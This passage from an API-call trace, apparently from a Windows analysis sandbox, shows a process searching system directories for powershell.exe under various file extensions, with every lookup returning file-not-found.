	[0194.874] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.COM", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.875] GetLastError () returned 0x2
	[0194.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.875] GetLastError () returned 0x2
	[0194.875] SetErrorMode (uMode=0x1) returned 0x1
	[0194.875] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.EXE", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.875] GetLastError () returned 0x2
	[0194.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.875] GetLastError () returned 0x2
	[0194.875] SetErrorMode (uMode=0x1) returned 0x1
	[0194.876] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.BAT", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.876] GetLastError () returned 0x2
	[0194.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.876] GetLastError () returned 0x2
	[0194.876] SetErrorMode (uMode=0x1) returned 0x1
	[0194.876] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.CMD", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.876] GetLastError () returned 0x2
	[0194.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.876] GetLastError () returned 0x2
	[0194.876] SetErrorMode (uMode=0x1) returned 0x1
	[0194.877] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.VBS", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.877] GetLastError () returned 0x2
	[0194.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.877] GetLastError () returned 0x2
	[0194.877] SetErrorMode (uMode=0x1) returned 0x1
	[0194.877] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.VBE", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.877] GetLastError () returned 0x2
	[0194.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.877] GetLastError () returned 0x2
	[0194.877] SetErrorMode (uMode=0x1) returned 0x1
	[0194.878] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.JS", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.878] GetLastError () returned 0x2
	[0194.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.878] GetLastError () returned 0x2
	[0194.878] SetErrorMode (uMode=0x1) returned 0x1
	[0194.878] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.JSE", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.878] GetLastError () returned 0x2
	[0194.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.878] GetLastError () returned 0x2
	[0194.878] SetErrorMode (uMode=0x1) returned 0x1
	[0194.879] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.WSF", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.879] GetLastError () returned 0x2
	[0194.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.879] GetLastError () returned 0x2
	[0194.879] SetErrorMode (uMode=0x1) returned 0x1
	[0194.879] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.WSH", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.879] GetLastError () returned 0x2
	[0194.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.879] GetLastError () returned 0x2
	[0194.879] SetErrorMode (uMode=0x1) returned 0x1
	[0194.880] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.MSC", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.880] GetLastError () returned 0x2
	[0194.880] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.880] GetLastError () returned 0x2
	[0194.880] SetErrorMode (uMode=0x1) returned 0x1
	[0194.880] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.880] GetLastError () returned 0x2
	[0194.880] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.880] GetLastError () returned 0x2
	[0194.881] SetErrorMode (uMode=0x1) returned 0x1
	[0194.881] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.ps1", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.881] GetLastError () returned 0x2
	[0194.881] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.881] GetLastError () returned 0x2
	[0194.881] SetErrorMode (uMode=0x1) returned 0x1
	[0194.881] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.psm1", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.881] GetLastError () returned 0x2
	[0194.882] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.882] GetLastError () returned 0x2
	[0194.882] SetErrorMode (uMode=0x1) returned 0x1
	[0194.882] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.psd1", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.882] GetLastError () returned 0x2
	[0194.882] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.882] GetLastError () returned 0x2
	[0194.882] SetErrorMode (uMode=0x1) returned 0x1
	[0194.882] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.COM", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.882] GetLastError () returned 0x2
	[0194.882] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.883] GetLastError () returned 0x2
	[0194.883] SetErrorMode (uMode=0x1) returned 0x1
	[0194.883] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.EXE", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.883] GetLastError () returned 0x2
	[0194.883] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.883] GetLastError () returned 0x2
	[0194.883] SetErrorMode (uMode=0x1) returned 0x1
	[0194.883] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.BAT", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.883] GetLastError () returned 0x2
	[0194.884] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.884] GetLastError () returned 0x2
	[0194.884] SetErrorMode (uMode=0x1) returned 0x1
	[0194.884] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.CMD", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.884] GetLastError () returned 0x2
	[0194.884] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.884] GetLastError () returned 0x2
	[0194.884] SetErrorMode (uMode=0x1) returned 0x1
	[0194.884] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.VBS", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.884] GetLastError () returned 0x2
	[0194.885] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.885] GetLastError () returned 0x2
	[0194.885] SetErrorMode (uMode=0x1) returned 0x1
	[0194.885] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.VBE", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.885] GetLastError () returned 0x2
	[0194.885] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.885] GetLastError () returned 0x2
	[0194.885] SetErrorMode (uMode=0x1) returned 0x1
	[0194.885] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.JS", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.885] GetLastError () returned 0x2
	[0194.886] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.886] GetLastError () returned 0x2
	[0194.886] SetErrorMode (uMode=0x1) returned 0x1
	[0194.886] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.JSE", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.886] GetLastError () returned 0x2
	[0194.886] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.886] GetLastError () returned 0x2
	[0194.886] SetErrorMode (uMode=0x1) returned 0x1
	[0194.886] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.WSF", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.886] GetLastError () returned 0x2
	[0194.887] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.887] GetLastError () returned 0x2
	[0194.887] SetErrorMode (uMode=0x1) returned 0x1
	[0194.887] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.WSH", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.887] GetLastError () returned 0x2
	[0194.887] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.887] GetLastError () returned 0x2
	[0194.887] SetErrorMode (uMode=0x1) returned 0x1
	[0194.887] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.MSC", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.887] GetLastError () returned 0x2
	[0194.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0194.888] GetLastError () returned 0x2
	[0194.888] SetErrorMode (uMode=0x1) returned 0x1
	[0194.888] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.283] GetLastError () returned 0x2
	[0195.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.283] GetLastError () returned 0x2
	[0195.283] SetErrorMode (uMode=0x1) returned 0x1
	[0195.283] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.ps1", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.286] GetLastError () returned 0x2
	[0195.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.286] GetLastError () returned 0x2
	[0195.286] SetErrorMode (uMode=0x1) returned 0x1
	[0195.286] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.psm1", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.288] GetLastError () returned 0x2
	[0195.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.288] GetLastError () returned 0x2
	[0195.288] SetErrorMode (uMode=0x1) returned 0x1
	[0195.289] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.psd1", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.291] GetLastError () returned 0x2
	[0195.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.291] GetLastError () returned 0x2
	[0195.291] SetErrorMode (uMode=0x1) returned 0x1
	[0195.291] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.COM", lpFindFileData=0x786f38 | out: lpFindFileData=0x786f38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0195.293] GetLastError () returned 0x2
	[0195.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5fce604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0195.294] GetLastError () returned 0x2
	[0195.294] SetErrorMode (uMode=0x1) returned 0x1
